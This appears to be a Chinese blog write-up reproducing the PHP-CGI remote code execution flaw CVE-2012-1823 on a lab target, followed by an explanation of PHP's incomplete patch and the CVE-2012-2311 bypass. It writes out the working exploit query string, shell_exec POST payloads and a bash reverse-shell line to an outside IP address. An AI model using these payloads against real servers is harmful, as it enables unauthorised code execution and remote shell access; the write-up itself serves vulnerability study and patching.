phpcgi 代码执行 (CVE-2012-1823) 复现

最新推荐文章于 2024-05-12 22:34:51 发布
最新推荐文章于 2024-05-12 22:34:51 发布
阅读量690 收藏 1
点赞数 1
分类专栏: 漏洞复现 文章标签: php 安全 开发语言
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/YouthBelief/article/details/121145793
版权

@[TOC](phpcgi 代码执行 (CVE-2012-1823))
所有文章,仅供安全研究与学习之用,后果自负!

phpcgi 代码执行 (CVE-2012-1823)

通过阅读源码,发现cgi模式下通过可控命令行参数有如下一些参数可用:
-c 指定php.ini文件的位置
-n 不要加载php.ini文件
-d 指定配置项
-b 启动fastcgi进程
-s 显示文件源码
-T 执行指定次该文件
-h和-? 显示帮助

访问下边页面 返回源码 说明存在该漏洞
ip:port/index.php/?-s

0x01 漏洞描述

CGI全称是“通用网关接口”(Common Gateway Interface), 它可以让一个客户端,从网页浏览器向执行在Web服务器上的程序请求数据 这个漏洞简单来说,就是用户请求的querystring(querystring字面上的意思就是查询字符串,一般是对http请求所带的数据进行解析,这里也是只http请求中所带的数据)被作为了php-cgi的参数,最终导致了一系列结果。

0x02 影响范围

php-5.3.12 以下

0x03 漏洞复现

(1) 访问靶场主页

http://118.193.36.37:46102/index.html

在这里插入图片描述
(2)访问 /index.php

http://118.193.36.37:46102/index.php

在这里插入图片描述
(3) 访问下边页面 返回源码 说明存在该漏洞

http://118.193.36.37:46102/index.php/?-s

在这里插入图片描述
存在该漏洞

任意代码执行

访问下边网址burp 抓包

http://118.193.36.37:46102/index.php/?-d+allow_url_include%3don+-d+auto_prepend_file%3dphp%3a//input

post请求体如下

<?php echo shell_exec("id"); ?>
执行成功

在这里插入图片描述
ls /tmp

<?php echo shell_exec("ls /tmp"); ?>

在这里插入图片描述

反弹shell

<?php echo shell_exec("bash -i >& /dev/tcp/119.29.67.4/9897 0>&1"); ?>

失败 可能 权限不足

在这里插入图片描述
在这里插入图片描述

0x04 漏洞修复

漏洞修复参考 https://www.cnblogs.com/riginal/p/11314565.html

CVE-2012-2311
这个漏洞被爆出来以后,PHP官方对其进行了修补,发布了新版本5.4.2及5.3.12,但这个修复是不完全的,可以被绕过,进而衍生出CVE-2012-2311漏洞。

PHP的修复方法是对-进行了检查:

if(query_string = getenv("QUERY_STRING")) {
        decoded_query_string = strdup(query_string);
        php_url_decode(decoded_query_string, strlen(decoded_query_string));
        if(*decoded_query_string == '-' && strchr(decoded_query_string, '=') == NULL) {
            skip_getopt = 1;
        }
        free(decoded_query_string);
    }

可见,获取querystring后进行解码,如果第一个字符是-则设置skip_getopt,也就是不要获取命令行参数。

这个修复方法不安全的地方在于,如果运维对php-cgi进行了一层封装的情况下:

 #!/bin/sh  
    exec /usr/local/bin/php-cgi $*

通过使用空白符加-的方式,也能传入参数。这时候querystring的第一个字符就是空白符而不是-了,绕过了上述检查。

于是,php5.4.3和php5.3.13中继续进行修改:

if((query_string = getenv("QUERY_STRING")) != NULL && strchr(query_string, '=') == NULL) {
        /* we've got query string that has no = - apache CGI will pass it to command line */
        unsigned char *p;
        decoded_query_string = strdup(query_string);
        php_url_decode(decoded_query_string, strlen(decoded_query_string));
        for (p = decoded_query_string; *p &&  *p <= ' '; p++) {
            /* skip all leading spaces */
        }
        if(*p == '-') {
            skip_getopt = 1;
        }
        free(decoded_query_string);
    }

先跳过所有空白符(小于等于空格的所有字符),再判断第一个字符是否是-。

LuckyCharm~
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
PHP-CGI Windows平台远程代码执行漏洞复现(CVE-2024-4577)
0xSec
06-08 2742
2024年6月,PHP官方发布新版本,修复了PHP-CGI中一个远程代码执行漏洞。鉴于该漏洞无前置条件,易于利用,且默认情况下可获取操作系统权限,建议所有使用受影响版本的企业尽快升级修复,以确保安全
PHP-CGI远程代码执行漏洞(CVE-2012-1823
orchid_sea的博客
07-19 2630
在启动docker容器时,提示ServerName错误。将配置文件从容器中复制出来修改,再复制回去。将ServerName位置添加所需IP。检查一下是否修改成功。
CVE-2012-1823PHP-CGI远程代码执行漏洞(80端口)
最新发布
m0_62670778的博客
05-12 628
php-cgi是一个类似于消息的“传递者”,它接收web容器收到的http数据包,并把里面的数据交给PHP解释器执行php-cgi有两个功能,一是提供cgi方式的交互,二是提供fastcgi方式的交互cgi方式:web容器接收到http数据包后,拿到用户请求的文件(cgi脚本),并fork除一个子进程(解释器)去执行这个文件,然后拿到执行结果,直接返回给用户,然后子进程结束,但是这个cgi模式不能接收同时接收大量的请求,因为创建进程的时候会消耗服务器资源,资源也不是无限的,所以有了fastcgi
CVE-2012-1823 php-cgi远程代码执行
cnbird's blog
12-22 2501
CVE-2012-1823php-cgi远程代码执行,FastCGI不受影响。PHP官方暂时未发布补丁,请受影响的站长按文章下方提供的方式打好临时补丁。 http://eindbazen.net/2012/05/php-cgi-advisory-cve-2012-1823/ via:knownsec POC: 1、本地包含直接执行代码: curl -H "USER-AGENT: " h
PHP-CGI远程任意代码执行漏洞(CVE-2012-1823)修复方案
weixin_34342905的博客
04-20 436
  首先介绍一下这个漏洞,其实是在apache调用php解释器解释.php文件时,会将url参数传我给php解释器,如果在url后加传命令行开关(例如-s、-d 、-c或 -dauto_prepend_file%3d/etc/passwd+-n)等参数时,会导致源代码泄露和任意代码执行。   这个漏洞影响php-5.3.12以前的版本,mod方式、fpm方式不受影响。   既然...
oracle 11.2.0.1 CVE-2012-1675 补丁:p12880299_112010_Linux-x86-64.zip
01-19
CVE-2012-1675是一个特定的漏洞,它可能允许未经身份验证的远程攻击者执行代码或获取敏感信息,对系统的安全性构成威胁。 补丁“p12880299”是Oracle官方发布的一个修复程序,旨在修补CVE-2012-1675漏洞。补丁编号...
CVE-2020-21224 ClusterEngineV4.0 远程代码执行.md
04-11
CVE-2020-21224 ClusterEngineV4.0 远程代码执行
PHP-CGI远程代码执行漏洞分析与防范
10-19
本文给大家介绍的是PHP-CGI远程代码执行漏洞(CVE-2012-1823)分析和防范,这是最近爆出的一个php的比较严重的漏洞,这里分享给大家。
Phpmyadmin后台代码执行CVE-2016-5734_poc
09-30
Phpmyadmin后台代码执行CVE-2016-5734_poc CVE-2016-5734在exploit-db上也就是 phpMyAdmin 4.6.2 - Authenticated Remote Code Execution ,意即phpMyAdmin认证用户的远程代码执行,根据描述可知受影响的phpMyAdmin...
Palo Alto防火墙远程代码执行漏洞复现
Just Do It
12-26 3828
最近,花了点时间复现了一下这个漏洞,踩过一些坑,在这里记录一下。关于这个漏洞的情况,可以看这里。       文章介绍说,三个漏洞组合完成代码执行的过程。作者其实写的蛮清楚的,但是在第三步是有一些坑要踩的。       首先,来复现部分权限绕过,先访问/php/utils/debug.php。会直接跳转到登录页面,如下图所示:       接着按照作者指导的方式,访问/esp/cms_c
CVE-2012-1823
qq_53063436的博客
01-05 2132
CVE-2012-1823详细介绍 漏洞复现(靶场为ctfshow) 利用 http://url/index.php?-s 判断是否存在漏洞 若出现源码组存在 bp抓包按下面修改 POST /index.php?-d+allow_url_include%3don+-d+auto_prepend_file%3dphp%3a//input HTTP/1.1 Host: example.com Accept: */* Accept-Language: en User-Agent: Mozilla/5.0 (co
ctfshow web入门(phpcve)
qq_53263789的博客
07-19 710
ctfshow
php调用命令行的cgi,PHP CGI 和命令行设置
weixin_39574065的博客
03-10 190
用户评论:gordon_e_rouse at yahoo dot com dot au (2008-02-28 00:25:06)Have noticed on debian now, and may be true of other builds, that if you are using php as a command line language, you don't need the -...
CVE-2012-1823PHP-CGI远程代码执行漏洞
weixin_45253622的博客
05-20 1336
漏洞原理 php-cgi是一个类似于消息的“传递者”,它接收web容器收到的http数据包,并把里面的数据交给PHP解释器执行php-cgi有两个功能,一是提供cgi方式的交互,二是提供fastcgi方式的交互。 cgi方式:web容器接收到http数据包后,拿到用户请求的文件(cgi脚本),并fork除一个子进程(解释器)去执行这个文件,然后拿到执行结果,直接返回给用户,然后子进程结束,但是这个cgi模式不能接收同时接收大量的请求,因为创建进程的时候会消耗服务器资源,资源也不是无限的,所以有了
cgi实现php,PHP: CGI 和命令行设置 - Manual
weixin_33910191的博客
03-10 159
for using fastcgi external server in place of cgi or mod php with php:to compile fastcgi librairie:wget http://www.fastcgi.com/dist/fcgi-2.4.0.tar.gztar xzvf fcgi-2.4.0.tar.gzcd fcgi-2.4.0./configurem...
cve-2022-30190 msdt远程代码执行漏洞复现
09-10
这就是CVE-2022-30190 msdt远程代码执行漏洞的一个简单复现过程。然而,值得注意的是,这只是为了说明该漏洞的原理,实际的攻击可能需要更复杂的技术和步骤。为了保护系统安全,我们建议及时更新受影响的软件,以...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值